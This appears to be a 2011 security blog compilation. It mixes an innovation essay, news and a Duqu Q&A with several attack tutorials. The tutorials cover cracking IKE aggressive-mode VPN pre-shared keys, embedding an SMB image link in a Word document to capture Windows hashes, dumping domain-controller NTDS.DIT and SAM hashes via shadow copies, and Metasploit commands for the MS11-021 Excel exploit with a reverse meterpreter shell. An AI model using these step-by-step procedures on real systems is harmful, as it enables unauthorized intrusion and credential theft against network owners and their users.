Friday, December 9, 2011

Use Jugaad to Innovate Faster, Cheaper, Better

This is not a techie post, but I just loved what the post author had to say. A grand shout out to Jugaad innovators.

We recently attended the World Economic Forum's India Economic Summit 2011 in Mumbai, where we moderated several panels and workshops on the topic of innovation. The experience gave us some insights into a unique approach to innovation called jugaad, which entrepreneurs and enterprises are practicing in complex emerging markets like India.

Jugaad is a Hindi word that loosely translates as "the gutsy art of overcoming harsh constraints by improvising an effective solution using limited resources." Jugaad is an antidote to the complexity of India: a country of mind-blogging diversity; pervasive scarcity of all kinds; and exploding interconnectivity (India is adding 10 million cellphone subscribers every month).

This highly resource-constrained and chaotic environment inspires jugaad innovators — i.e., the Indian entrepreneurs and corporations who practice jugaad to develop market-relevant products and services that are inherently affordable and sustainable. Jugaad innovators are modern-day alchemists who transmute adversity into opportunity, and in so doing create value for their organizations and communities. And while we first learned about jugaad while conducting field research in India over the past several years, we've found that jugaad innovators exist around the world, including right here in the U.S.

There are three aspects of jugaad that make it particularly effective. Specifically:

Jugaad innovators innovate faster: Jugaad innovators don't use linear, pre-planned, time-consuming R&D processes. Rather, they rely heavily on rapid prototyping techniques — i.e., they collaborate intimately with customers and use their constant feedback to zero in on the most relevant product features. For instance, Jane Chen and Rahul Panicker, Stanford graduates and co-founders of Embrace, worked closely with village pediatricians and patients in rural India to iteratively optimize the design of their breakthrough portable infant warmer — which costs less than 5% of incubators sold in the West (which are typically priced around $20,000).

Jugaad innovators innovate cheaper: Jugaad innovators are very frugal. Rather than reinventing the wheel or splurging on expensive R&D projects, they develop new solutions by building upon existing infrastructure and assets, as well as by recombining existing solutions. In doing so, they can pass the cost savings on to their customers. For instance, YES Bank, one of India's leading private banks, has deployed a mobile payment solution that enables money transfer via cellphones without the need for a bank account. This solution piggybacks on India's existing robust mobile telephony infrastructure that extends to the remotest of villages in India (a country where nearly 870 million people have cellphones, but 600 million or so do not have a bank account).

Jugaad innovators innovate better: Jugaad innovators recognize that consumers in emerging markets are low earners, but high yearners. As such, jugaad innovators attempt to meet customers' high aspirations by developing solutions that are not only affordable, but that also deliver superior value. In sum, they strive to deliver more (value) for less (cost). Take, for instance, SELCO, an Indian renewable energy firm founded by the U.S.-educated Harish Hande. Recognizing the diverse needs of the Indian rural population, SELCO set out to personalize the value proposition of its solar lanterns to individual customers — be they a village midwife who doesn't want the toxic fumes of a kerosene lamp polluting her patient's environment; a rosebud collector looking for a modular lighting solution that can be repaired quickly in a remote location; or a vegetable seller who doesn't want to contend with the electrical outages that are typical across India. As a result, more than 115,000 rural customers now use SELCO's solar lanterns — not only because they are affordable, but because they deliver superior value by addressing customers' unique needs.

What makes jugaad innovators so adept at innovating faster, cheaper, and better? The answer lies in their unique mindset — characterized by two key attributes: adaptability and inclusivity.

Jugaad innovators are highly adaptable: Indian entrepreneurs who practice jugaad are a resilient bunch: they continually find ways to bounce back from the adversity that permeates every aspect of their lives. Jugaad innovators sense and respond to rapid changes in their environment by dynamically reinventing their business models. For instance, Chen and Panicker, co-founders of Embrace, initially set out to design a fixed incubator at a low-cost — but once they discovered that Indian village women preferred to hold their newborn babies close to their bodies, they quickly adapted their business model around a portable infant warmer.

Jugaad innovators are inclusive: In India, more than 800 million citizens lack access to healthcare, 600 million are unbanked, and 400 million live off the electricity grid. While most corporations view these marginal segments as being unprofitable, jugaad innovators like YES Bank's Rana Kapoor and SELCO's Harish Hande have invented inclusive business models for profitably serving the millions who live on the margins of society. For these entrepreneurs, including the margin not only provides for greater social good, it also makes great business sense.

Interestingly, we have noticed that jugaad is practiced not only by Indian entrepreneurs and corporations, but also by some pioneering multinationals in India. Take GE Healthcare, for instance,which used the flexible jugaad mindset to make high-quality cancer diagnosis and treatment accessible to underdeveloped communities across India. Until recently, India had been importing the radioisotopes required for nuclear imaging such as PET/CT scans. This was not only unaffordable for many rural hospitals, it was ineffective because the radioisotopes decay over time (in hours or even minutes), so they need to be administered to the patient soon after they're produced. GE Healthcare partnered with private diagnostic centers and airline companies to locally produce radioisotopes — and make deliveries on a just-in-time basis to small-town hospitals around the country. Now, with GE Healthcare's frugal "pay-per-use" pricing model and just-in-time delivery mechanism, the supply of radioisotopes has become affordable and dependable for many rural hospitals.

The jugaad mindset — and its associated principles and practices — is increasingly relevant for companies worldwide who are seeking to grow in an increasingly complex and resource-constrained business environment. Unlike traditional, structured innovation methods that rely on time-consuming and expensive R&D processes, the more fluid jugaad approach delivers speed, agility, and cost efficiencies. Jugaad is a "bottom up" innovation approach that provides organizations in both emerging and developed economies the key capabilities they need to succeed in a hypercompetitive and fast-moving world: frugality, inclusivity, collaboration, and adaptability.

Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

Carnal0wnange blog has this nice article about hacking into IPSEC tunnels in aggressive mode.

There hasn't been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what i'm talking about go read this: and

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:
$ sudo ike-scan
Starting ike-scan 1.9 with 1 hosts ( Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A
Starting ike-scan 1.9 with 1 hosts ( Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value= Nonce(20 bytes) Hash(16 bytes)
To save with some output:
$ sudo ike-scan -A --id=myid -P192-168-207-134key
Once you have you psk file to crack you're stuck with two options psk-crack and cain

psk-crack is fairly rudamentary

to brute force:

$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
To dictionary attack:

$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack.

Thursday, December 1, 2011

XSSer v.1.6 BETA Released

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.It contains several options to try to bypass certain filters, and various special techniques of code injection.


Core: Added Drop Cookie option + Added Random IP X-Forwarded-For an X-Client-IP option + Added GSS and NTLM authentication methods + Added Ignore proxy option + Added TCP-NODELAY option + Added Follow redirects option + Added Follow redirects limiter parameter + Added Auto-HEAD precheck system + Added No-HEAD option + Added Isalive option + Added Check at url option (Blind XSS) + Added Reverse Check parameter + Added PHPIDS (v.0.6.5) exploit + Added More vectors to auto-payloading + Added HTML5 studied vectors + Fixed Different bugs on core + Fixed Curl handlerer options + Fixed Dorkerers system + Fixed Bugs on results propagation + Fixed POST requests. GTK: Added New features to GTK controller + Added Detailed views to GTK interface


Wednesday, November 30, 2011

Embeding A Link To A Network Share In A Word Doc

Taken from Carnal0wnage blog, this is an excellent method to embed network share in a word document.

snip snip .......

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":

[html][body][img src="\\\share\pwn.jpeg"
width=1 height=1][/body][html]
Once that is done go to insert-->object--text from file-->select your HTML file

Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.

If this doesnt work for anyone let me know.

Session Hijacking - SSL Session Sidejacking (SSLStrip, Hamster, Ferret)

Mutillidae 2.1.7 Deliberately Vulnerable Web App Updated (a lot)

Jeremy Druin has been doing a lot of work on Mutillidae. Here is the change long since the last time I mentioned it:

Change Log for Mutillidae 2.1.7:

Added a new page for HTML5 storage. The page is meant to show how to both use and attack HTML5 storage. The page supports Local and Session storage types. The user can attack the storage in two contexts. They can act as if they want to read to contents of their own browsers session storage to see if the developer put authorization tokens or other items into the storage. They can also try to use XSS to steal the session storage. In this use-case the user would be acting as if they wanted to read someone elses storage. A large number of hints has been added to the page. The page name is "html5-storage.php" and can be accessed from the Cross Site Scripting menu and information leakage menu. In security level zero, the page has no defenses. In level 1, the page will use trivial JavaScript validation. In security level 5, the page will refuse to put the secrets in client side storage.

11/13/2011: Jeremy Druin / Kenny Kurtz

Change Log for Mutillidae 2.1.6:

Enhanced the .htaccess file to automatically disable magic quotes on systems which enable them by default (such as some OSX versions of PHP)
Fixed some bugs in the phpinfo.php file that made the page display weird.
Enhanced the hidden PHPINFO page so that it would work if the user browsed to http://localhost/mutillidae/index.php?page=phpinfo.php or to http://localhost/mutillidae/phpinfo.php. This example assumes Mutillidae is running on localhost.
Fixed a bug in index.php that kept the log-visit page from being included.
Fixed a bug in log-visit.php that kept the page from working.
Fixed installation instructions format for IE 8 not in compatibility mode.

11/10/2011: Jeremy Druin

Change Log for Mutillidae 2.1.5:

Added vuln to login sequence. Now a cookie is created with username. Students should try to XSS the cookie and see what happens. Also try a response splitting attack because a cookie is an HTTP header.
Created new twitter feed to make Mutillidae announcements and other web vulnerability tweaks. @webpwnized
Fixed installation instructions format for IE 8 not in compatibility mode

10/14/2011: Jeremy Druin

Change Log for Mutillidae 2.1.4:

Moved usage instructions and php errors from the home page to their own pages.
In insecure mode, changed the method of the user-info.php page to GET in order to make it easier to use sqlmap against Mutillidae. sqlmap supports POST but it is easier to use with GET.
Added hints about sqlmap to sql injection tutorial and to the easter egg file
Added a credit card table as a target in the database
Confirmed that the view-blog table can be attacked with sqlmap. The answer is in the Easter Egg file.

10/13/2011: Jeremy Druin

Change Log for Mutillidae 2.1.3:

Fix a bug. If the user was on the home page, without having clicked any link to this point (such as when using a bookmark), then the user clicked the "change security level", the page would redirect to page not found.
Increased the slide time for the ddsmoothmenu to make it slow down a little bit
Added a NEW vulnerability. Many sites have crazy pages that show server settings, expose admin functionality, allow configuration, or other features a user should not be able to see. The problem is not the pages themselves so much as the fact that developers think no one will guess the name and browse to them. Shoulder surfing, guessing, brute-forcing, etc can be used to find these pages. Mutillidae now has such a page. It is in the "Server Misconfiguration" category. See secret-administrative-pages.php for hints.
Augmented the installation instructions
Added link to ihackcharities to front page
Added a new security level. Now there is security level 1. The only difference in this release between level 0 and level 1 is that level 1 has JS validation. The JS validation has been in place for a while to allow but was activated in level 0. Since level 0 is supposed to be very easy, the decision was made to create level 1 and move JS validation to level 1. The JS validation is trivial to bypass. Simply disable JS or use a proxy such as Tamper Data, Paros, Burp, WebScarab, or others.
Page homenotes.php has been merged with home.php.
Page home.html has been renamed home.php
Added protection for SQL injection to add to your blog.php output of the current users blog entries. Prior to this patch, you could SQL inject in security level 5 by putting your injection in the current users login name because the query uses the current users login name as the input to the query.
Improved the DNS lookup page to add JS validation in security level 1 mode.
Changed padding for BACK button to use styles rather than HTML BR tags.
Changed the password generator password length to 15 to set a better example.
Some refactoring on user-info.php and login.php to clean up code
Added CSRF Protection to page add to your blog. This only works in secure mode.
Added more scripts to the easter egg file (Mutillidae Test Scripts)
Bug fix: The setupandreset.php errors were not printing out.
Stupid bug fix: Removed the "open DB" that was firing before the database was actually created.
Created output on page setupandreset.php to show what happened
Added try/catch and more error handling to setupandreset.php

Wednesday, November 23, 2011

Top 10 iPhone Security Tips

This paper offers guidelines on securing your iPhone using features provided by iOS and by following other security best practices.It begins by discussing basic security settings for novice users and then continues to discuss advanced techniques for expert users.This paper is intended for users who want to take proactive measures to secure their iPhones,companies willing to train their employees (before allowing corporate emails on the devices),and administrators working on developing strong policies.It confines its discussion to iPhone security features only and does not discuss similar features that may be available in other mobile device platforms such as Android.However,some of the concepts and standards apply across all these devices.

Download PDF here.

Tuesday, November 22, 2011

Dumping hashes from live DCs...

Lanmaster presented VSSOWN in hackercon and picking up from that rubble, and pushing this technique further to dump hashes off a live DC. Actual blog entry from Pauldotcom is here. It goes like this

The basis of the talk and the purpose for Mark's research is that there are some really cool things you can do with Volume Shadow Copies in modern Windows Operating Systems. Our talk takes the approach of using Shadow Copies for hiding malware on Windows systems, but Mark mentions during the talk how one can access protected system files through Shadow Copies as well.

The day after we first presented "Lurking in the Shadows" at Hack3rCon II, Matt Graeber (@mattifestation) reached out to me and asked if I'd ever tried to take the SAM, SYSTEM hive or NTDS.DIT files from a live system using this technique. At the time, I hadn't. So, I immediately fired up my Windows 7 box, created a Shadow Copy with VSSOwn, and attempted to copy the SAM and SYSTEM hive files directly from the Shadow Copy. To my surprise, the 2 files copied without any non-readable errors! I guess I knew it would be possible, as Mark and I were already beating around this bush, but this meant something bigger. Something huge. Was it now possible to dump the NTDS.DIT and SYSTEM hive files from a LIVE domain controller for offline hash dumping? I quickly promoted one of my 2008 Servers to a DC, psexec'd a meterpreter shell to it and took a shot at the NTDS.DIT file with VSSOwn. The file copied out of the Shadow Copy without issue.

So it appears that Mark and I have uncovered some interesting stuff here. You can access anything that is supposed to be locked down and protected on a Windows system by accessing them through Shadow Copies. I can only imagine how we are going to begin seeing this used in the wild and I'm interested to see what others come up with.

But wait a sec. I still don't have hashes. All I have is the SYSTEM hive and the NTDS.DIT file. What can we do with these? Well, up until recently, nothing for free. No one had built a free, open source tool for parsing NTDS.DIT files and decrypting the hashes. But during my quest to find something, Jeremy Pommerening tweeted a link to this white paper. In brief, a security researcher named Csaba Barta took some existing tools and modified them to parse through the NTDS.DIT file and extract the hashes from it. Awesome! The link is complete! I combined Mark and my technique with Csaba's tools and here is the result:

1. Create a new Shadow Copy.
cscript vssown.vbs /start (optional)
cscript vssown.vbs /create

2. Pull the following files from a shadow copy:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

3. Copy files to BT5R1.

2. Download tools from:

3. Configure and Make the source code for libesedb from the extracted package.
cd libesedb
chmod +x configure
./configure && make

4. Use esedbdumphash to extract the datatable from ntds.dit.
cd esedbtools
./esedbdumphash ../../ntds.dit

5a. Use to dump the hashes from the datatable using the bootkey from the SYSTEM hive.
cd ../../creddump/
python ./ ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

5b. Use bkhive and samdump2 to dump the hashes from the SAM file using the bootkey from the SYSTEM hive.
bkhive SYSTEM key.txt
samdump2 SAM key.txt

6. Crack the hashes.

Beautiful right? But we're not done yet. Csaba also created a tool called which dumps the PAST hashes of all the users as well. Now you can crack the historical passwords of users and identify patterns in their password history.

python ./ ../system ../libesedb/esedbtools/ntds.dit.export/datatable

So what exactly does this mean? No more dangerous LSSAS injection to dump domain hashes and no more drive mounting to access locked and protected system files. This is just plain awesome! Huge props to Csaba Barta for the tools and kick ass white paper, Matt Graeber for the idea (and everything else it seems like recently), and dakykilla for providing the files I needed to test all this stuff. You guys rock!

Hackers attack a US water utility

Hackers destroyed a pump used by a US water utility after gaining unauthorized access to the industrial control system it used to operate its machinery. Five computer screenshots posted early Friday purport to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas.

''This is arguably the first case where we have had a hack of critical infrastructure from outside the United States that caused damage,'' a managing partner at Applied Control Solutions, Joseph Weiss, said.

The network breach was exposed after cyber intruders burned out a pump. ''No one realised the hackers were in there until they started turning on and off the pump,'' he said.

It said hackers apparently broke into a software company's database and retrieved usernames and passwords of various control systems that run water plant computer equipment.Using that data, they were able to hack into the Illinois plant.

The U.S. Department of Homeland Security and the Federal Bureau of Investigation are examining the matter, said DHS spokesman Peter Boogaard.

"At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety," he said, declining to elaborate further. An FBI spokesman in Illinois did not return phone calls seeking comment.

Is it hard to crack full Disk Encryption For Law Enforcement ?

If you'd rather keep your data private, take heart: disk encryption is a lot harder to break than techno-thriller movies and TV shows make it out to be, to the chagrin of some branches of law enforcement. MrSeb writes with word of a paper titled "The growing impact of full disk encryption on digital forensics" that illustrates just how difficult it is. According to the paper, co-authored by a member of US-CERT.

Abstract of Paper is available here, and Short Info written below:
The increasing use of full disk encryption (FDE) can significantly hamper digital investigations, potentially preventing access to all digital evidence in a case. The practice of shutting down an evidential computer is not an acceptable technique when dealing with FDE or even volume encryption because it may result in all data on the device being rendered inaccessible for forensic examination. To address this challenge, there is a pressing need for more effective on-scene capabilities to detect and preserve encryption prior to pulling the plug. In addition, to give digital investigators the best chance of obtaining decrypted data in the field, prosecutors need to prepare search warrants with FDE in mind. This paper describes how FDE has hampered past investigations, and how circumventing FDE has benefited certain cases. This paper goes on to provide guidance for gathering items at the crime scene that may be useful for accessing encrypted data, and for performing on-scene forensic acquisitions of live computer systems. These measures increase the chances of acquiring digital evidence in an unencrypted state or capturing an encryption key or passphrase. Some implications for drafting and executing search warrants to dealing with FDE are discussed.

The paper does go on to suggest some ways to ameliorate these issues, though Better awareness at the evidence-gathering stage would help, but it also suggests “on-scene forensic acquisition” of data, which involves ripping unencrypted data from volatile, live memory with the cryogenic RAM freezing technique, presumably). Ultimately, though, the researchers aren’t hopeful: “Research is needed to develop new techniques and technology for breaking or bypassing full disk encryption,” concludes the paper.

Thursday, November 17, 2011

Hotfix For SRP/AppLocker Bypass

Remember Microsoft has features to bypass its own Software Restriction Policies and AppLocker: Circumventing SRP and AppLocker, By Design and Circumventing SRP and AppLocker to Create a New Process, By Design.

Microsoft has issued a hotfix for this bypass: KB2532445

It is only for Windows 7 and Windows Server 2008 R2 though, it will not help you if you use SRP on Windows XP or Vist

Tuesday, November 15, 2011

Uniscan 2.0 Released

Uniscan is a open source vulnerability scanner for Web applications. Uniscan 2.0 is a perl vulnerability scanner for RFI, LFI, RCE, XSS and SQL-injection. 
  • Identification of system pages through a Web Crawler.
  • Use of threads in the crawler.
  • Control the maximum number of requests the crawler.
  • Control of variation of system pages identified by Web Crawler.
  • Control of file extensions that are ignored.
  • Test of pages found via the GET method.
  • Test the forms found via the POST method.
  • Support for SSL requests (HTTPS).
  • Proxy support.
  • Generate site list using Google.
  • Generate site list using Bing.
  • Plug-in support for Crawler.
  • Plug-in support for dynamic tests.
  • Plug-in support for static tests.
  • Plug-in support for stress tests.

Tutorials to create your plug-ins:

Thursday, November 10, 2011

Metasploit Changes to Git

Metasploit is changing from using their own SVN server to host their repository to GitHub and by this move to Git as their tool for managing the main repository available to the public for getting access to the Framework source code. This also changes the way commits are done, if any none Rapid7 employee or contractor member of the development team wants to contribute code it will have to be thru GitHub pull request feature. This will allow Rapid7 better control over who commits and the quality of the commits making sure that their commercial products Metasploit Community, Pro and Express do not get affected by a contribution that did not go thru a proper test procedure and quality assurance. In addition the shift from SVN to Git will allow greater flexibility to the Rapid7 team to make modification to the the framework on forks and branches on their own systems allowing them to keep the main repository as stable as possible and changes to be pushed in a less risky manner. This is great business move since it will reduce risk and accelerate development of the base foundation of their products, allowing the team to focus more on the technical an engineering aspects of the projects and less on the over heads of managing code on their machines. In terms of management of community commits the pull requests will centralize the process from Redmine and the emails to msfdev mailing list making it easier for them to get contributions for the Framework. I do have to say I will miss the ability to be able to push my own changes and fixes and will have to rely like everybody else to the fork process and GitHub pull request method like everybody else but in the long run this a better solution for the stability of the code, faster innovation and risk reduction allowing Rapid7 to further advanced the Framework that is base of some of their commercial products.

Now this does changes my workflow for the code I write for use in Metasploit. I do have a GitHub account that I used as my temporary account for plugins and modules, I will be consolidating this one in to one single project in GitHub and making sure it follows the folder structure as in the framework so I can just have it in my machine under ~/.msf4 that way I can test modify and test modules and plugins without the need of putting them in the framework folder it self and move them in to the forked version if I wish to contribute them to Rapid7 if not they will still be accessible for sharing under my GitHub page. So there are now 2 new ways to use the framework repository depending on your need, If you are only to consume the code in it and do not wish to contribute your code to Rapid7 you just need to have Git on your system and clone the repository. You first start by installing Git

Installing Git

On OS X you only need to install the latest Xcode Tools from the AppStore On CentOS 6 and latest Fedora Systems you would run as root

yum update

yum install git

On Ubuntu and Debian systems you would run as root

apt-get update

apt-get install git-core

Cloning the Repository

I’m a person who likes having several copies of the Framework to work in, I tend to keep in my home folder on my boxes a folder call dev where I keep all the project repositories I use. So I recommend you start by creating the folder to host the project and its copies if you later decide to fork and work on coding inside the Framework.

mkdir -p ~/dev

cd ~/dev

Once the folder is create you only need to clone the Git repository that is on GitHub

git clone git://

Now you should be able to use and work from inside the metasploit-framework folder created there. To keep you copy updated you only need to run from the folder

git pull

This will fetch the latest changes and merge them together.

Monday, November 7, 2011

Hack3rcon II 2-2 Tim Tomes and Mark Baggett Lurking in the Shadows

This nice talk will discuss the history of concealing data within operating systems and new techniques and tools for doing so in modern Windows implementations.

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway

Vulnerability reported to vendor by ZDI the 2010-10-18

Coordinated release of the vulnerability the 2011-04-12

Metasploit PoC provided the 2011-11-05

PoC provided by :




juan vazquez

Reference(s) :




Affected version(s) :

Microsoft Office XP Service Pack 3

Microsoft Office 2003 Service Pack 3

Microsoft Office 2007 Service Pack 2

Microsoft Office 2010 (32 and 64 bits edition)

Microsoft Office 2004 for Mac

Microsoft Office 2008 for Mac

Microsoft Office for Mac 2011

Open XML File Format Converter for Mac

Microsoft Excel Viewer Service Pack 2

Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp


Thursday, November 3, 2011

Lab Matters - Inside the Sony Hack

Lab Matters - Inside the Sony Hack:

Tim Armstrong looks at the timeline of the Sony breach and pieces together the relevant details at each point in time. He discusses the known facts of the case and the potential future fallout.

13 Out Of 15 Popular CAPTCHA Schemes Vulnerable To Automated Attacks

Security researchers have discovered the vast majority of text-based anti-spam tests are easily defeated.

Computer scientists from Stanford University discovered 13 of 15 CAPTCHA schemes from popular websites were vulnerable to automated attacks. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) has been used for several years to prevent automated sign-ups to webmail accounts or online forums in order to block spam bots. Surfers are typically asked during a registration process to identify distorted letters as depicted in an image. A variety of other approaches – including pictures of cats, audio clips and calculus puzzles – have been applied to the problem over the years.

Cybercrooks have responded to the challenge posed by CAPTCHAs by devising techniques that typically involve semi-automatically signing up for new accounts, while relying on the human cogs in 21st century sweatshops – typically located in India – to solve the CAPTCHA puzzles themselves.

The Stanford team, by contrast, looked at whether it was possible to fully automate the process of breaking CAPTCHAs. Their techniques including removing deliberately introduced image background noise and breaking text strings into single characters for easier recognition. The team built an automated tool, called Decaptcha, that applied these various tricks. The approach was partially inspired by techniques used to orientate robots in unknown environments.

Decaptcha was turned against the challenge response CAPTCHAs used by 15 high-profile websites, enjoying excellent bowling figures against the majority.

For example, Visa’s payment gateway CAPTCHA was defeated 66 per cent of the time. eBay’s CAPTCHA was sidestepped 43 per cent of the time. Lower, but still workable, bypass rates were achieved against Wikipedia, Digg and CNN.

Google and reCAPTCHA were the only two CAPTCHA systems that consistently thwarted Decaptcha during the tests. and Digg have both switched to reCAPTCHA since these tests were run, Computerworld adds.

In a research paper (PDF), the Stanford team suggest several approaches towards making CAPTCHAs harder to beat, including making the length of a text string changeable and randomising character font and size. Lines in the background of CAPTCHAs might also prove effective. In addition, the Stanford team highlighted features that are ineffective against automated attacks but may counter the activities of humans.

The researchers, Elie Bursztein, Matthieu Martin and John C Mitchel, who previously developed techniques for breaking audio CAPTCHAs, presented their latest research at the recent ACM Conference On Computer and Communication Security in Chicago.

Duqu: Questions and Answers

Duqu: Questions and Answers: Due to its complexity, case Duqu is challenging to understand. Here are some questions and answers that we hope will help.

Q: What is Duqu?
A: Because of the news and ongoing developments surrounding Duqu, that's actually a very broad question. Here's a narrow answer: Duqu is a Windows bot (not worm) that has been used as part of highly targeted attacks against a limited number of organizations, in a limited number of countries.

Q: How does Duqu spread?
A: Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

Q: Isn't that the same method by which RSA was hacked?
A: Yes. Numerous targeted attacks have used this method. In the RSA case, an Excel document attachment used an embedded Flash object that exploited a zero-day vulnerability in Adobe Flash Player to install a backdoor/remote access tool (RAT) called Poison Ivy.

Q: So what's so special about Duqu's exploit?
A: The zero-day used by Duqu's installer exploits a vulnerability in the Windows kernel.

Q: How much more advanced is a Window kernel exploit than a Flash Player exploit?
A: What? Please.

Q: No, seriously, how much?
A: Significantly more. A Windows kernel vulnerability/exploit is worth a great deal more compared to one used against a third-party application, even one so widely installed as Flash Player.

Q: Can I patch my system against this vulnerability?
A: No. You can't.

Q: So what can I do if this Windows kernel vulnerability is unpatched?
A: Wait. Microsoft Security Response is currently investigating the vulnerability and is preparing a solution. Fortunately, the exploit document is in very limited circulation, and is under an NDA.

Q: Why is there an NDA on the document?
A: Because it was such a highly targeted attack, the document itself would most likely reveal the identity of the target. Sharing the document would be a breach of customer confidentially, and therefore, CrySyS Lab (discoverer of Duqu) cannot release the document unless done in a way that protects the privacy of their customer.

Q: So Duqu's installer is not "in-the-wild"?
A: Not generally, no. Though there could be some other undiscovered variants.

Q: So is Duqu a threat to me?
A: That depends on whom you are. But generally, no. However, Duqu will eventually create a big problem.

Q: What problem will Duqu create?
A: Once Microsoft patches the Windows kernel vulnerability, criminals at large will be able to reverse engineer the patch, and will discover the vulnerability. At that point, any Windows computer that isn't up to date will be more vulnerable to what could prove be to be a very serious exploit.

Q: But not yet?
A: Correct.

Q: Is there anything else interesting about Duqu?
A: Yes, definitely. In one known case, a driver used by Duqu was signed using a stolen certificate issued to a Taiwanese hardware company called C-Media.

Q: Why did Duqu use a signed driver?
A: Signed drivers can circumvent security policies that prompt about or reject installation of unsigned drivers. Security policies can be configured to inherently distrust unsigned drivers. Having a driver signed by a known vendor provides a valuable level of trust.

Q: So then is that why Duqu such a big deal? Because of the zero-day and the signed driver?
A: That… and because Duqu is "related" to Stuxnet.

Q: How is it related?
A: A component of "Duqu" is nearly identical to a component of "Stuxnet" and they appear to have been authored by somebody that has access to common source code.

Q: What else relates "Duqu" and "Stuxnet"?
A: One the drivers used by "Duqu" claims to be from a Taiwanese hardware company called JMicron. Stuxnet used drivers that were signed by a certificate stolen from JMicron.

Q: How were the certificates stolen?
A: Unknown.

Q: How many were stolen?
A: Known cases, three different hardware vendors from Taiwan: C-Media; JMicron; and Realtek.

Q: Why is "Duqu" connected to Taiwan?
A: Unknown.

Q: Why the quotes? What else is "Duqu"?
A: In a broad sense, Duqu is an "organized action" or a "mission" that has been deployed (or authorized) by a nation state.

Q: What do you mean by an "organized action"?
A: "Duqu" appears to be an espionage or reconnaissance mission of some sort. For example, in the real world, a reconnaissance mission of this sort could be considered what United States Marine Corp Force Reconnaissance (FORECON) teams call a "Green Operation".

Q: So "Duqu" isn't just malicious code?
A: The software component is only one part of what we call Duqu. Think about it like this: there's Duqu software and there's also Operation Duqu.

Q: And "Stuxnet"? What about the Stuxnet worm?
A: The installer used by Operation Stuxnet was an advanced USB worm. The worm used a zero-day Windows vulnerability to facilitate its spread.

Q: Are the missions of Operation Duqu and Operation Stuxnet the same?
A: No. Operation Stuxnet was more of a "Black Operation", a mission that involves direct action, which in Stuxnet's case, was to disrupt operations at an Iranian nuclear power facility.

Q: Stuxnet disrupted operations at a nuclear power plant?
A: Yes. Operation Stuxnet was very complex, and also, subtle. The Stuxnet worm and its additional components needed to travel a sizeable distance geographically. It also needed to infiltrate a closed target which was not connected to the Internet, on autopilot, without calling home.

Q: So that's why Stuxnet used a USB worm as the installer/infection vector?
